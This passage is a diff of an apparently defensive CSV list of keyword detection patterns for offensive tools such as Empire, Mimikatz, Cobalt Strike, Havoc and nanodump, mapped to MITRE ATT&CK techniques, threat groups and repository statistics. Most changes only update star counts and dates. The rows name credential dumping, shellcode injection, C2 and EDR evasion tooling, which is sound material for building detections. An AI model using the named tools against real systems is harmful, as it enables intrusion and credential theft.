","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Import-DllImports -PEInfo *","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*Import-DllImports*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - 
Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Import-DllInRemoteProcess*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1105","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Import-DllInRemoteProcess*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Import-DllInRemoteProcess*","offensive_tool_keyword","mimikatz","Invoke-Mimikatz.ps1 function name","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation 
tools","https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Import-DllInRemoteProcess*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*Import-Module *Microsoft.ActiveDirectory.Management.dll*","offensive_tool_keyword","powershell","redteam technique - import the ActiveDirectory module without the need to install it on the current computer - the dll has been extracted from a Windows 10 x64 with RSAT installed","T1110.001 - T1110.003 - T1110.004","TA0006","N/A","N/A","Credential Access","https://github.com/mthcht/Purpleteam/blob/main/Simulation/Windows/ActiveDirectory/Bruteforce.ps1","1","0","N/A","N/A","1","91","6","2023-10-01T14:24:00Z","2022-12-05T12:40:02Z" "*Inactive Domain Admins Honey Tokens*","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","0","N/A","8","3","270","60","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z" -"*inceptor*POWERSHELL*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion 
Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"*inceptor.py *","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"*inceptor/obfuscators*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"*inceptor-main.zip*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"*include beacon.h*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - 
TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","0","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*include injection.c*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","0","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*inceptor*POWERSHELL*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*inceptor.py 
*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*inceptor/obfuscators*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*inceptor-main.zip*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*include beacon.h*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang 
Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","0","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*include injection.c*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","0","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" "*include*bofmask.h*","offensive_tool_keyword","BOFMask","BOFMask is a proof-of-concept for masking Cobalt Strike's Beacon payload while executing a Beacon Object File (BOF)","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/passthehashbrowns/BOFMask","1","1","N/A","10","1","94","24","2023-06-28T14:35:32Z","2023-06-27T21:19:22Z" "*incognito* list_tokens -u*","offensive_tool_keyword","AD exploitation cheat sheet","Token Manipulation Tokens can be impersonated from other users with a session/running processes on the machine. 
Most C2 frameworks have functionality for this built-in (such as the Steal Token functionality in Cobalt Strike)","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*incognito.exe*","offensive_tool_keyword","AD exploitation cheat sheet","Token Manipulation Tokens can be impersonated from other users with a session/running processes on the machine. Most C2 frameworks have functionality for this built-in (such as the Steal Token functionality in Cobalt Strike)","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
-"*infection_monkey.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z"
+"*infection_monkey.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z"
 "*info@skelsecprojects.com*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z"
 "*infoga.py -*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
-"*information_gathering_tools.py*","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","39264","4347","2023-09-13T19:08:33Z","2020-04-11T09:21:31Z"
+"*information_gathering_tools.py*","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","39278","4350","2023-09-13T19:08:33Z","2020-04-11T09:21:31Z"
 "*infosecn1nja/SharpDoor*","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.","T1076 - T1059 - T1085 - T1070.004","TA0008 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","1","N/A","7","3","298","64","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z"
 "*Initial_Access.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z"
 "*InitialAccess_SpearphishingAttachment_FakeWordDoc.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z"
@@ -11634,63 +11787,63 @@
 "*initialize_spoofed_callstack*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z"
 "*initializeShellcodeFluctuation*","offensive_tool_keyword","C2 related tools","An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ShellcodeFluctuation","1","1","N/A","10","10","770","143","2022-06-17T18:07:33Z","2021-09-29T10:24:52Z"
 "*Initializing domainDumper()*","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","10","5","418","49","2023-10-03T14:10:17Z","2021-07-21T19:20:00Z"
-"*initstring/cloud_enum*","offensive_tool_keyword","cloud_enum","Multi-cloud OSINT tool. Enumerate public resources in AWS Azure and Google Cloud.","T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/initstring/cloud_enum","1","1","N/A","6","10","1238","199","2023-07-31T07:27:37Z","2019-05-31T09:14:05Z"
-"*inject 1337 /*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z"
+"*initstring/cloud_enum*","offensive_tool_keyword","cloud_enum","Multi-cloud OSINT tool. Enumerate public resources in AWS Azure and Google Cloud.","T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/initstring/cloud_enum","1","1","N/A","6","10","1242","199","2023-07-31T07:27:37Z","2019-05-31T09:14:05Z"
+"*inject 1337 /*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z"
 "*inject shellcode*","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","10","10","244","73","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z"
-"*inject.spawn*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z"
-"*inject.spoofaddr*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z"
+"*inject.spawn*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z"
+"*inject.spoofaddr*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z"
 "*inject_dll_reflective.py*","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1100 - T1059 - T1505","TA0002 - TA0003 - TA0004","N/A","N/A","Web Attacks","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","9","809","144","2023-09-27T08:48:31Z","2019-03-10T22:09:40Z"
 "*inject_dll_srdi.py*","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1100 - T1059 - T1505","TA0002 - TA0003 - TA0004","N/A","N/A","Web Attacks","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","9","809","144","2023-09-27T08:48:31Z","2019-03-10T22:09:40Z"
 "*inject_shellcode.py*","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1100 - T1059 - T1505","TA0002 - TA0003 - TA0004","N/A","N/A","Web Attacks","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","9","809","144","2023-09-27T08:48:31Z","2019-03-10T22:09:40Z"
 "*inject_shellcode_self*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505
